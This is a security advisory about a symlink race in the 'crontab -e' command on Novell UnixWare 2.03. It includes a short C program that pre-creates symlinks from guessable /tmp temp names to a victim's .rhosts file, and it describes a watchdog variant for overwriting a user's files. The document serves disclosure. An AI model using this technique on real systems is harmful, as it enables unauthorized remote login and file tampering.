COMMAND

    crontab

SYSTEMS AFFECTED

    Novell  UnixWare  2.03  (UNIX  System  V Release 4.2 MP), possibly
    other versions of UnixWare.

PROBLEM

    'crontab -e' command creates a temporary file in /tmp to pass  the
    crontab file for editing with a text editor. The name of the  file
    is easily guessable and it seems  to be based on process ID  (e.g.
    /tmp/crontaba00421).

    'crontab -e' doesn't check if the file already exists in /tmp  and
    will gladly follow any symbolic links there might be waiting.

    A malicious  user can  create a  bunch of  symbolic links  in /tmp
    with a  little C  program, if  he knows  that someone  is going to
    edit his/her crontab file. The code might be something like this:

#include <stdio.h>
#include <unistd.h>

char *foo="0123456789ABCDEF";

int main ( void )
{
  char *ps1, *ps2, s[32];

  for (ps1=foo;*ps1;ps1++)
    for (ps2=foo;*ps2;ps2++) {
      sprintf(s,"/tmp/crontaba002%c%c",*ps1,*ps2);
      symlink("/home/joe/.rhosts",s);
    }
}

    Now when joe edit  his crontab file, it  will be saved as  .rhosts
    in his home  directory. This is  dangerous, because crontab  files
    often include nice characters like '*' which act as a wildcard  in
    .rhosts.

    The user doesn't have  to be joe. A  malicious user might build  a
    watchdog  which  replaces  the  symbolic  link  with  a  new (e.g.
    /home/sam/.rhosts)  while  user  is  editing  his  crontab file (a
    watchdog which  seeks for  processes like  'crontab -e'  and 'pico
    /tmp/crontab*'

    By replacing the symbolic link  while user is editing the  crontab
    file, a malicious  user might also  be able to  overwrite any file
    owned by the user.